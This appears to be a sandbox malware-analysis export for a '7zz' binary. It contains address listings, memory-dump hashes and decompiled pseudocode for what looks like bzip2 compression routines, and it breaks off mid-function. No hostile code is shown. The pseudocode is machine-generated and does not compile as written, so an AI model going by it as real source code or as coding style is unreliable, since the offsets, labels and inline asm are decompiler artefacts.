                                                                                                                                    0x0045110a
                                                                                                                                    0x0045110f
                                                                                                                                    0x00451113
                                                                                                                                    0x0045112a
                                                                                                                                    0x00451156
                                                                                                                                    0x0045116a
                                                                                                                                    0x00451176
                                                                                                                                    0x0045117b
                                                                                                                                    0x0045118f
                                                                                                                                    0x0045119b
                                                                                                                                    0x004511a5
                                                                                                                                    0x004511ab
                                                                                                                                    0x0045112c
                                                                                                                                    0x00451130
                                                                                                                                    0x00451138
                                                                                                                                    0x00451149
                                                                                                                                    0x0045114e
                                                                                                                                    0x0045113a
                                                                                                                                    0x0045113a
                                                                                                                                    0x0045113a
                                                                                                                                    0x00451138
                                                                                                                                    0x004511b2
                                                                                                                                    0x004511b7
                                                                                                                                    0x004511ba
                                                                                                                                    0x004511cc
                                                                                                                                    0x004511c5
                                                                                                                                    0x004511c5
                                                                                                                                    0x004511c5
                                                                                                                                    0x004511d0
                                                                                                                                    0x004511d6
                                                                                                                                    0x00451282
                                                                                                                                    0x00451287
                                                                                                                                    0x0045128a
                                                                                                                                    0x004513d0
                                                                                                                                    0x004513d7
                                                                                                                                    0x004513e2
                                                                                                                                    0x004513e3
                                                                                                                                    0x004513e6
                                                                                                                                    0x004513ed
                                                                                                                                    0x00451404
                                                                                                                                    0x0045140b
                                                                                                                                    0x0045140c
                                                                                                                                    0x0045140f
                                                                                                                                    0x00451416
                                                                                                                                    0x00451426
                                                                                                                                    0x00451430
                                                                                                                                    0x00451437
                                                                                                                                    0x0045144e
                                                                                                                                    0x0045144e
                                                                                                                                    0x0045144e
                                                                                                                                    0x0045145a
                                                                                                                                    0x0045145b
                                                                                                                                    0x00451462
                                                                                                                                    0x00451476
                                                                                                                                    0x00451481
                                                                                                                                    0x00451482
                                                                                                                                    0x0045148c
                                                                                                                                    0x004514a8
                                                                                                                                    0x004514b8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0045146e
                                                                                                                                    0x0045146e
                                                                                                                                    0x0045146e
                                                                                                                                    0x00451422
                                                                                                                                    0x00451422
                                                                                                                                    0x00451422
                                                                                                                                    0x004513f9
                                                                                                                                    0x004513f9
                                                                                                                                    0x004513f9
                                                                                                                                    0x00451290
                                                                                                                                    0x00451290
                                                                                                                                    0x00451292
                                                                                                                                    0x0045129b
                                                                                                                                    0x004512a2
                                                                                                                                    0x004512a3
                                                                                                                                    0x004512b3
                                                                                                                                    0x004512b9
                                                                                                                                    0x004512b9
                                                                                                                                    0x004512bb
                                                                                                                                    0x004512bd
                                                                                                                                    0x004512bf
                                                                                                                                    0x004512da
                                                                                                                                    0x004512e0
                                                                                                                                    0x004512e1
                                                                                                                                    0x004512e7
                                                                                                                                    0x004512e9
                                                                                                                                    0x00000000
                                                                                                                                    0x004512eb
                                                                                                                                    0x004512eb
                                                                                                                                    0x004512ed
                                                                                                                                    0x004512f1
                                                                                                                                    0x004512f7
                                                                                                                                    0x004512fd
                                                                                                                                    0x00451301
                                                                                                                                    0x00451306
                                                                                                                                    0x0045130a
                                                                                                                                    0x00451317
                                                                                                                                    0x0045131f
                                                                                                                                    0x00451323
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0045132c
                                                                                                                                    0x00451331
                                                                                                                                    0x00451333
                                                                                                                                    0x00451333
                                                                                                                                    0x00451338
                                                                                                                                    0x00451346
                                                                                                                                    0x0045134b
                                                                                                                                    0x00451352
                                                                                                                                    0x00451356
                                                                                                                                    0x0045135f
                                                                                                                                    0x00451364
                                                                                                                                    0x00451366
                                                                                                                                    0x00451366
                                                                                                                                    0x0045136d
                                                                                                                                    0x00451371
                                                                                                                                    0x00451377
                                                                                                                                    0x00451383
                                                                                                                                    0x0045138d
                                                                                                                                    0x0045138d
                                                                                                                                    0x00451393
                                                                                                                                    0x00451399
                                                                                                                                    0x0045139b
                                                                                                                                    0x0045139b
                                                                                                                                    0x00451364
                                                                                                                                    0x0045139f
                                                                                                                                    0x004513a3
                                                                                                                                    0x00000000
                                                                                                                                    0x004513a9
                                                                                                                                    0x004513a9
                                                                                                                                    0x004513ab
                                                                                                                                    0x004513b6
                                                                                                                                    0x004513b8
                                                                                                                                    0x004513c0
                                                                                                                                    0x004513c8
                                                                                                                                    0x004513c8
                                                                                                                                    0x004513ca
                                                                                                                                    0x004513cb
                                                                                                                                    0x00000000
                                                                                                                                    0x004513ab
                                                                                                                                    0x00000000
                                                                                                                                    0x004513a3
                                                                                                                                    0x00000000
                                                                                                                                    0x00451306
                                                                                                                                    0x00000000
                                                                                                                                    0x004512e9
                                                                                                                                    0x00000000
                                                                                                                                    0x004512bf
                                                                                                                                    0x004511dc
                                                                                                                                    0x004511ec
                                                                                                                                    0x004511f6
                                                                                                                                    0x00451491
                                                                                                                                    0x0045149a
                                                                                                                                    0x004511fc
                                                                                                                                    0x004511ff
                                                                                                                                    0x00451211
                                                                                                                                    0x00451214
                                                                                                                                    0x0045121f
                                                                                                                                    0x00451222
                                                                                                                                    0x00451225
                                                                                                                                    0x00451225
                                                                                                                                    0x00451227
                                                                                                                                    0x00451229
                                                                                                                                    0x00451229
                                                                                                                                    0x00451230
                                                                                                                                    0x00451242
                                                                                                                                    0x00451246
                                                                                                                                    0x00451232
                                                                                                                                    0x00451239
                                                                                                                                    0x00451239
                                                                                                                                    0x0045124c
                                                                                                                                    0x00451254
                                                                                                                                    0x00451259
                                                                                                                                    0x0045125b
                                                                                                                                    0x00451265
                                                                                                                                    0x00451268
                                                                                                                                    0x0045126b
                                                                                                                                    0x0045126c
                                                                                                                                    0x0045126c
                                                                                                                                    0x0045127e
                                                                                                                                    0x0045127e
                                                                                                                                    0x004511f6
                                                                                                                                    0x00451118
                                                                                                                                    0x00451121
                                                                                                                                    0x00451121
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5a7e5d09e26d5753100cc2568189196292b632a231a3296cbee244cacba0436a
                                                                                                                                    • Instruction ID: 7ffc51f0b6ed8d7e1b84f6e78e82dd49a9c305e9cdf2e8039c63d13bff25686b
                                                                                                                                    • Opcode Fuzzy Hash: 5a7e5d09e26d5753100cc2568189196292b632a231a3296cbee244cacba0436a
                                                                                                                                    • Instruction Fuzzy Hash: 45D1F1327043454FDB28CE68D8907EEB7D2ABC9305F44093EED8AC7782D678A949C795
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00449460 Relevance: .3, Instructions: 343COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E00449460(intOrPtr __ecx) {
				signed char _t107;
				signed char _t110;
				signed char _t133;
				signed char _t134;
				signed int _t137;
				signed int _t139;
				signed char _t141;
				signed char _t143;
				signed char _t148;
				signed char _t149;
				signed char _t158;
				signed char _t160;
				signed char _t169;
				signed char _t170;
				signed char _t185;
				signed char _t186;
				signed char _t189;
				signed char _t219;
				intOrPtr _t251;
				intOrPtr _t257;
				intOrPtr* _t264;
				signed char _t265;
				void* _t267;
				intOrPtr _t269;
				intOrPtr* _t273;
				signed char _t274;
				void* _t275;
				void* _t276;
				signed char _t277;
				void* _t278;
				intOrPtr _t279;
				void* _t280;

				_push(0xffffffff);
				_push(E00479538);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t279;
				_t280 = _t279 - 0x10;
				_t269 = __ecx;
				 *((intOrPtr*)(__ecx + 0x1b0)) =  *((intOrPtr*)(_t279 + 0x20));
				_t107 = E004481D0(__ecx);
				if(_t107 == 0) {
					_t185 = 0;
					if( *((intOrPtr*)(__ecx + 0x198)) <= 0) {
						L9:
						_t273 = _t269 + 0x20;
						if(E0040DF95(_t273, 0x20000) != 0) {
							_t264 = _t269 + 0x140;
							_t110 = L0040EE76(_t264, 0x20000);
							__eflags = _t110;
							if(_t110 != 0) {
								_t251 =  *((intOrPtr*)(_t280 + 0x30));
								E0040DFE4(_t273, _t251);
								E0040DFF3(_t273);
								L0040EEC1(_t264,  *((intOrPtr*)(_t280 + 0x34)));
								L0040EED0(_t264);
								 *(_t264 + 0x28) = 8;
								 *(_t264 + 0x2c) = 0;
								 *((intOrPtr*)(_t280 + 0x30)) = _t269;
								_t186 = 0;
								 *((intOrPtr*)(_t280 + 0x28)) = 0;
								 *((intOrPtr*)(_t269 + 0x174)) = 0;
								 *((intOrPtr*)(_t269 + 0x1a0)) = 0;
								 *((char*)(_t269 + 0x1a5)) = 0;
								 *((char*)(_t269 + 0x1a4)) = 0;
								L00467B30(_t269 + 0x1a8);
								E004486E0(0x42);
								E004486E0(0x5a);
								E004486E0(0x68);
								E004486E0( *((intOrPtr*)(_t269 + 0x10)) + 0x30);
								__eflags =  *(_t269 + 0x19c);
								if( *(_t269 + 0x19c) == 0) {
									_t187 =  *((intOrPtr*)(_t269 + 0x178));
									__eflags = E00448490(_t269,  *((intOrPtr*)( *((intOrPtr*)(_t269 + 0x178)))));
									if(__eflags == 0) {
										L31:
										_t186 = 0;
										__eflags = 0;
										goto L32;
									} else {
										while(1) {
											_t189 = E00449200(_t187, __eflags, _t123);
											__eflags = _t189;
											if(_t189 != 0) {
												break;
											}
											__eflags =  *(_t280 + 0x40);
											if( *(_t280 + 0x40) == 0) {
												L30:
												_t187 =  *((intOrPtr*)(_t269 + 0x178));
												_t251 =  *((intOrPtr*)( *((intOrPtr*)(_t269 + 0x178))));
												__eflags = E00448490(_t269, _t251);
												if(__eflags != 0) {
													continue;
												} else {
													goto L31;
												}
											} else {
												asm("cdq");
												asm("adc edx, ecx");
												 *((intOrPtr*)(_t280 + 0x18)) =  *_t273 -  *((intOrPtr*)(_t273 + 8)) +  *((intOrPtr*)(_t273 + 0x10));
												 *((intOrPtr*)(_t280 + 0x1c)) = _t251;
												 *((intOrPtr*)(_t280 + 0x10)) = L0040EEE8(_t264) + (0xf -  *(_t264 + 0x28) >> 3);
												_t158 =  *(_t280 + 0x40);
												asm("adc edx, ebx");
												 *((intOrPtr*)(_t280 + 0x18)) = _t251;
												_t189 =  *((intOrPtr*)( *_t158 + 0xc))(_t158, _t280 + 0x1c, _t280 + 0x10);
												__eflags = _t189;
												if(_t189 != 0) {
													_t160 =  *(_t269 + 0x2c);
													 *((intOrPtr*)(_t280 + 0x28)) = 0xffffffff;
													__eflags = _t160;
													if(_t160 != 0) {
														 *((intOrPtr*)( *_t160 + 8))(_t160);
														 *(_t269 + 0x2c) = 0;
													}
													_t149 =  *(_t269 + 0x154);
													__eflags = _t149;
													if(_t149 != 0) {
														L53:
														 *((intOrPtr*)( *_t149 + 8))(_t149);
														 *(_t269 + 0x154) = 0;
													}
													L54:
													_t107 = _t189;
												} else {
													goto L30;
												}
											}
											goto L55;
										}
										_t148 =  *(_t269 + 0x2c);
										 *((intOrPtr*)(_t280 + 0x28)) = 0xffffffff;
										__eflags = _t148;
										if(_t148 != 0) {
											 *((intOrPtr*)( *_t148 + 8))(_t148);
											 *(_t269 + 0x2c) = 0;
										}
										_t149 =  *(_t269 + 0x154);
										__eflags = _t149;
										if(_t149 != 0) {
											goto L53;
										}
										goto L54;
									}
								} else {
									L00467B10( *((intOrPtr*)(_t269 + 0x178)) + 0x8cf0);
									 *(_t269 + 0x1ac) = 0;
									L00467B10(_t269 + 0x17c);
									_t275 = 0;
									__eflags =  *(_t269 + 0x198);
									if( *(_t269 + 0x198) > 0) {
										do {
											L00467AC0( *((intOrPtr*)(_t186 +  *((intOrPtr*)(_t269 + 0x178)) + 0x8ce8)));
											_t275 = _t275 + 1;
											_t186 = _t186 + 0x8e00;
											__eflags = _t275 -  *(_t269 + 0x198);
										} while (_t275 <  *(_t269 + 0x198));
										_t186 = 0;
										__eflags = 0;
									}
									L00467B30(_t269 + 0x17c);
									L00467B10(_t269 + 0x1a8);
									_t276 = 0;
									__eflags =  *(_t269 + 0x198) - _t186;
									if( *(_t269 + 0x198) > _t186) {
										do {
											L00467AC0( *((intOrPtr*)(_t186 +  *((intOrPtr*)(_t269 + 0x178)) + 0x8cec)));
											_t276 = _t276 + 1;
											_t186 = _t186 + 0x8e00;
											__eflags = _t276 -  *(_t269 + 0x198);
										} while (_t276 <  *(_t269 + 0x198));
										_t186 = 0;
										__eflags = 0;
									}
									L00467B30(_t269 + 0x1a8);
									_t277 =  *(_t269 + 0x1ac);
									__eflags = _t277 - _t186;
									if(_t277 == _t186) {
										L32:
										E004486E0(0x17);
										E004486E0(0x72);
										E004486E0(0x45);
										E004486E0(0x38);
										E004486E0(0x50);
										E004486E0(0x90);
										E00448700(_t269,  *((intOrPtr*)(_t269 + 0x174)));
										_t274 =  *(_t264 + 0x28);
										__eflags = _t274 - 8;
										if(_t274 < 8) {
											__eflags = _t274;
											if(_t274 > 0) {
												while(1) {
													_t137 =  *(_t264 + 0x28);
													__eflags = _t274 - _t137;
													if(_t274 < _t137) {
														break;
													}
													_t274 = _t274 - _t137;
													_t219 = _t274;
													_t143 = _t186 >> _t219;
													_t186 = _t186 - (_t143 << _t219);
													 *( *((intOrPtr*)(_t264 + 4)) +  *_t264) =  *(_t264 + 0x2c) | _t143;
													_t257 =  *((intOrPtr*)(_t264 + 4)) + 1;
													 *((intOrPtr*)(_t264 + 4)) = _t257;
													__eflags = _t257 -  *((intOrPtr*)(_t264 + 8));
													if(__eflags == 0) {
														L0040EFBD(_t264, __eflags);
													}
													__eflags = _t274;
													 *(_t264 + 0x28) = 8;
													 *(_t264 + 0x2c) = 0;
													if(_t274 > 0) {
														continue;
													} else {
													}
													goto L40;
												}
												_t139 =  *(_t264 + 0x28) - _t274;
												 *(_t264 + 0x28) = _t139;
												_t141 =  *(_t264 + 0x2c) | _t186 << _t139;
												__eflags = _t141;
												 *(_t264 + 0x2c) = _t141;
											}
											L40:
											_t186 = 0;
											__eflags = 0;
										}
										_t265 = L0040EFA1(_t264);
										_t133 =  *(_t269 + 0x2c);
										__eflags = _t133 - _t186;
										 *((intOrPtr*)(_t280 + 0x28)) = 0xffffffff;
										if(_t133 != _t186) {
											 *((intOrPtr*)( *_t133 + 8))(_t133);
											 *(_t269 + 0x2c) = _t186;
										}
										_t134 =  *(_t269 + 0x154);
										__eflags = _t134 - _t186;
										if(_t134 != _t186) {
											 *((intOrPtr*)( *_t134 + 8))(_t134);
											 *(_t269 + 0x154) = _t186;
										}
										_t107 = _t265;
									} else {
										_t169 =  *(_t269 + 0x2c);
										 *((intOrPtr*)(_t280 + 0x28)) = 0xffffffff;
										__eflags = _t169 - _t186;
										if(_t169 != _t186) {
											 *((intOrPtr*)( *_t169 + 8))(_t169);
											 *(_t269 + 0x2c) = _t186;
										}
										_t170 =  *(_t269 + 0x154);
										__eflags = _t170 - _t186;
										if(_t170 != _t186) {
											 *((intOrPtr*)( *_t170 + 8))(_t170);
											 *(_t269 + 0x154) = _t186;
										}
										_t107 = _t277;
									}
								}
							} else {
								goto L12;
							}
						} else {
							_t107 = 0x8007000e;
						}
					} else {
						_t278 = 0;
						do {
							_t267 = _t278 +  *((intOrPtr*)(_t269 + 0x178));
							if( *(_t269 + 0x19c) == 0) {
								L7:
								 *((char*)(_t267 + 0x8cdc)) =  *((intOrPtr*)(_t269 + 0x14));
								if(L00447C30(_t267) == 0) {
									L12:
									_t107 = 0x8007000e;
								} else {
									goto L8;
								}
							} else {
								_t6 = _t267 + 0x8ce8; // 0x8ce8
								_t107 = L00467B30(_t6);
								if(_t107 == 0) {
									_t7 = _t267 + 0x8cec; // 0x8cec
									_t107 = L00467B30(_t7);
									if(_t107 == 0) {
										_t8 = _t267 + 0x8cf0; // 0x8cf0
										_t107 = L00467B30(_t8);
										if(_t107 == 0) {
											goto L7;
										}
									}
								}
							}
							goto L55;
							L8:
							_t185 = _t185 + 1;
							_t278 = _t278 + 0x8e00;
						} while (_t185 <  *(_t269 + 0x198));
						goto L9;
					}
				}
				L55:
				 *[fs:0x0] =  *((intOrPtr*)(_t280 + 0x20));
				return _t107;
			}



































                                                                                                                                    0x00449466
                                                                                                                                    0x00449468
                                                                                                                                    0x0044946d
                                                                                                                                    0x0044946e
                                                                                                                                    0x00449479
                                                                                                                                    0x0044947f
                                                                                                                                    0x00449482
                                                                                                                                    0x00449488
                                                                                                                                    0x0044948f
                                                                                                                                    0x0044949b
                                                                                                                                    0x0044949f
                                                                                                                                    0x00449515
                                                                                                                                    0x00449515
                                                                                                                                    0x00449526
                                                                                                                                    0x00449532
                                                                                                                                    0x0044953f
                                                                                                                                    0x00449544
                                                                                                                                    0x00449546
                                                                                                                                    0x00449552
                                                                                                                                    0x00449559
                                                                                                                                    0x00449560
                                                                                                                                    0x0044956c
                                                                                                                                    0x00449573
                                                                                                                                    0x00449578
                                                                                                                                    0x0044957f
                                                                                                                                    0x00449583
                                                                                                                                    0x00449587
                                                                                                                                    0x0044958f
                                                                                                                                    0x00449593
                                                                                                                                    0x00449599
                                                                                                                                    0x0044959f
                                                                                                                                    0x004495a5
                                                                                                                                    0x004495ab
                                                                                                                                    0x004495b4
                                                                                                                                    0x004495bd
                                                                                                                                    0x004495c6
                                                                                                                                    0x004495d4
                                                                                                                                    0x004495df
                                                                                                                                    0x004495e1
                                                                                                                                    0x004496dd
                                                                                                                                    0x004496ed
                                                                                                                                    0x004496ef
                                                                                                                                    0x00449782
                                                                                                                                    0x00449782
                                                                                                                                    0x00449782
                                                                                                                                    0x00000000
                                                                                                                                    0x004496f5
                                                                                                                                    0x004496f5
                                                                                                                                    0x004496fd
                                                                                                                                    0x004496ff
                                                                                                                                    0x00449701
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044970b
                                                                                                                                    0x0044970d
                                                                                                                                    0x0044976a
                                                                                                                                    0x0044976a
                                                                                                                                    0x00449772
                                                                                                                                    0x0044977a
                                                                                                                                    0x0044977c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044970f
                                                                                                                                    0x0044971d
                                                                                                                                    0x00449720
                                                                                                                                    0x00449724
                                                                                                                                    0x00449728
                                                                                                                                    0x00449746
                                                                                                                                    0x0044974a
                                                                                                                                    0x0044974e
                                                                                                                                    0x00449755
                                                                                                                                    0x00449760
                                                                                                                                    0x00449762
                                                                                                                                    0x00449764
                                                                                                                                    0x0044989a
                                                                                                                                    0x0044989d
                                                                                                                                    0x004498a5
                                                                                                                                    0x004498a7
                                                                                                                                    0x004498ac
                                                                                                                                    0x004498af
                                                                                                                                    0x004498af
                                                                                                                                    0x004498b6
                                                                                                                                    0x004498bc
                                                                                                                                    0x004498be
                                                                                                                                    0x004498c0
                                                                                                                                    0x004498c3
                                                                                                                                    0x004498c6
                                                                                                                                    0x004498c6
                                                                                                                                    0x004498d0
                                                                                                                                    0x004498d0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00449764
                                                                                                                                    0x00000000
                                                                                                                                    0x0044970d
                                                                                                                                    0x00449872
                                                                                                                                    0x00449875
                                                                                                                                    0x0044987d
                                                                                                                                    0x0044987f
                                                                                                                                    0x00449884
                                                                                                                                    0x00449887
                                                                                                                                    0x00449887
                                                                                                                                    0x0044988e
                                                                                                                                    0x00449894
                                                                                                                                    0x00449896
                                                                                                                                    0x00000000
                                                                                                                                    0x00449898
                                                                                                                                    0x00000000
                                                                                                                                    0x00449896
                                                                                                                                    0x004495e7
                                                                                                                                    0x004495f3
                                                                                                                                    0x004495fe
                                                                                                                                    0x00449604
                                                                                                                                    0x0044960f
                                                                                                                                    0x00449611
                                                                                                                                    0x00449613
                                                                                                                                    0x00449615
                                                                                                                                    0x00449629
                                                                                                                                    0x00449634
                                                                                                                                    0x00449635
                                                                                                                                    0x0044963b
                                                                                                                                    0x0044963b
                                                                                                                                    0x0044963f
                                                                                                                                    0x0044963f
                                                                                                                                    0x0044963f
                                                                                                                                    0x00449647
                                                                                                                                    0x00449652
                                                                                                                                    0x0044965d
                                                                                                                                    0x0044965f
                                                                                                                                    0x00449661
                                                                                                                                    0x00449663
                                                                                                                                    0x00449677
                                                                                                                                    0x00449682
                                                                                                                                    0x00449683
                                                                                                                                    0x00449689
                                                                                                                                    0x00449689
                                                                                                                                    0x0044968d
                                                                                                                                    0x0044968d
                                                                                                                                    0x0044968d
                                                                                                                                    0x00449695
                                                                                                                                    0x0044969a
                                                                                                                                    0x004496a0
                                                                                                                                    0x004496a2
                                                                                                                                    0x00449784
                                                                                                                                    0x00449788
                                                                                                                                    0x00449791
                                                                                                                                    0x0044979a
                                                                                                                                    0x004497a3
                                                                                                                                    0x004497ac
                                                                                                                                    0x004497b8
                                                                                                                                    0x004497c6
                                                                                                                                    0x004497cb
                                                                                                                                    0x004497ce
                                                                                                                                    0x004497d1
                                                                                                                                    0x004497d3
                                                                                                                                    0x004497d5
                                                                                                                                    0x004497d7
                                                                                                                                    0x004497d7
                                                                                                                                    0x004497da
                                                                                                                                    0x004497dc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004497de
                                                                                                                                    0x004497e2
                                                                                                                                    0x004497e4
                                                                                                                                    0x004497f2
                                                                                                                                    0x004497f6
                                                                                                                                    0x004497ff
                                                                                                                                    0x00449802
                                                                                                                                    0x00449805
                                                                                                                                    0x00449807
                                                                                                                                    0x0044980b
                                                                                                                                    0x0044980b
                                                                                                                                    0x00449810
                                                                                                                                    0x00449812
                                                                                                                                    0x00449819
                                                                                                                                    0x0044981d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044981f
                                                                                                                                    0x00000000
                                                                                                                                    0x0044981d
                                                                                                                                    0x00449824
                                                                                                                                    0x00449828
                                                                                                                                    0x00449830
                                                                                                                                    0x00449830
                                                                                                                                    0x00449832
                                                                                                                                    0x00449832
                                                                                                                                    0x00449835
                                                                                                                                    0x00449835
                                                                                                                                    0x00449835
                                                                                                                                    0x00449835
                                                                                                                                    0x0044983e
                                                                                                                                    0x00449840
                                                                                                                                    0x00449843
                                                                                                                                    0x00449845
                                                                                                                                    0x0044984d
                                                                                                                                    0x00449852
                                                                                                                                    0x00449855
                                                                                                                                    0x00449855
                                                                                                                                    0x00449858
                                                                                                                                    0x0044985e
                                                                                                                                    0x00449860
                                                                                                                                    0x00449865
                                                                                                                                    0x00449868
                                                                                                                                    0x00449868
                                                                                                                                    0x0044986e
                                                                                                                                    0x004496a8
                                                                                                                                    0x004496a8
                                                                                                                                    0x004496ab
                                                                                                                                    0x004496b3
                                                                                                                                    0x004496b5
                                                                                                                                    0x004496ba
                                                                                                                                    0x004496bd
                                                                                                                                    0x004496bd
                                                                                                                                    0x004496c0
                                                                                                                                    0x004496c6
                                                                                                                                    0x004496c8
                                                                                                                                    0x004496cd
                                                                                                                                    0x004496d0
                                                                                                                                    0x004496d0
                                                                                                                                    0x004496d6
                                                                                                                                    0x004496d6
                                                                                                                                    0x004496a2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00449528
                                                                                                                                    0x00449528
                                                                                                                                    0x00449528
                                                                                                                                    0x004494a1
                                                                                                                                    0x004494a1
                                                                                                                                    0x004494a3
                                                                                                                                    0x004494b1
                                                                                                                                    0x004494b5
                                                                                                                                    0x004494f0
                                                                                                                                    0x004494f3
                                                                                                                                    0x00449502
                                                                                                                                    0x00449548
                                                                                                                                    0x00449548
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004494b7
                                                                                                                                    0x004494b7
                                                                                                                                    0x004494bd
                                                                                                                                    0x004494c4
                                                                                                                                    0x004494ca
                                                                                                                                    0x004494d0
                                                                                                                                    0x004494d7
                                                                                                                                    0x004494dd
                                                                                                                                    0x004494e3
                                                                                                                                    0x004494ea
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004494ea
                                                                                                                                    0x004494d7
                                                                                                                                    0x004494c4
                                                                                                                                    0x00000000
                                                                                                                                    0x00449504
                                                                                                                                    0x0044950a
                                                                                                                                    0x0044950b
                                                                                                                                    0x00449511
                                                                                                                                    0x00000000
                                                                                                                                    0x004494a3
                                                                                                                                    0x0044949f
                                                                                                                                    0x004498d2
                                                                                                                                    0x004498da
                                                                                                                                    0x004498e4

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorEventLast$ObjectResetSingleWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2703132900-0
                                                                                                                                    • Opcode ID: 0079d454e35e10e96df4d7af03ea51e438f51775e4882a6c1d798cc27c30d208
                                                                                                                                    • Instruction ID: cb7edc23985cc21b463dff47bc8f4930bbb377ff39c12e3229b9d5c30bfef748
                                                                                                                                    • Opcode Fuzzy Hash: 0079d454e35e10e96df4d7af03ea51e438f51775e4882a6c1d798cc27c30d208
                                                                                                                                    • Instruction Fuzzy Hash: FBD16030304B059BE714EF79C490AABB7E5BF45318F044A2EE59A87781DB38AC45CB99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00450BD0 Relevance: .3, Instructions: 309COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E00450BD0(void* __ecx) {
				intOrPtr _t141;
				char* _t146;
				void* _t149;
				void* _t151;
				intOrPtr* _t153;
				intOrPtr* _t167;
				intOrPtr* _t169;
				int _t190;
				signed int _t191;
				void* _t202;
				unsigned int _t205;
				intOrPtr _t207;
				signed int _t208;
				char* _t210;
				intOrPtr _t215;
				intOrPtr _t244;
				intOrPtr _t247;
				unsigned int _t249;
				unsigned int _t250;
				signed int _t251;
				intOrPtr* _t257;
				int _t258;
				intOrPtr _t259;
				intOrPtr _t261;
				char _t266;
				signed int _t274;
				intOrPtr* _t275;
				void* _t278;
				int _t281;
				void* _t284;
				intOrPtr _t287;
				unsigned int _t291;
				signed int _t294;
				signed int _t298;
				signed int _t301;
				signed int _t302;
				void* _t303;
				void* _t304;
				void* _t305;

				_t303 = __ecx;
				_t281 = 0;
				goto L1;
				L3:
				while(0 <= 0x10) {
					 *_t257 = 0xffffffff;
					_t202 = _t202 + 1;
					_t257 = _t257 + 4;
					 *((intOrPtr*)(_t305 + 0x3c)) =  *((intOrPtr*)(_t305 + 0x3c)) + 1;
					if(_t202 < 0x14) {
						continue;
					} else {
						_t274 = 0;
						_t141 = 0;
						 *((intOrPtr*)(_t305 + 0x3c)) = 0;
						 *((intOrPtr*)(_t303 + 0x1648)) = 0;
						 *((intOrPtr*)(_t303 + 0x168c)) = 0;
						 *((intOrPtr*)(_t305 + 0x10)) = 0;
						_t258 = 1;
						while(1) {
							_t284 = _t305 + 0x3c + _t258 * 4;
							_t274 = _t274 + ( *(_t305 + 0x3c + _t258 * 4) << 0x10 - _t258);
							 *(_t305 + 0x1c) = _t274;
							if(_t274 > 0x10000) {
								goto L50;
							}
							_t205 = 0x10000;
							if(_t258 != 0x10) {
								_t205 = _t274;
							}
							 *(_t303 + 0x1648 + _t258 * 4) = _t205;
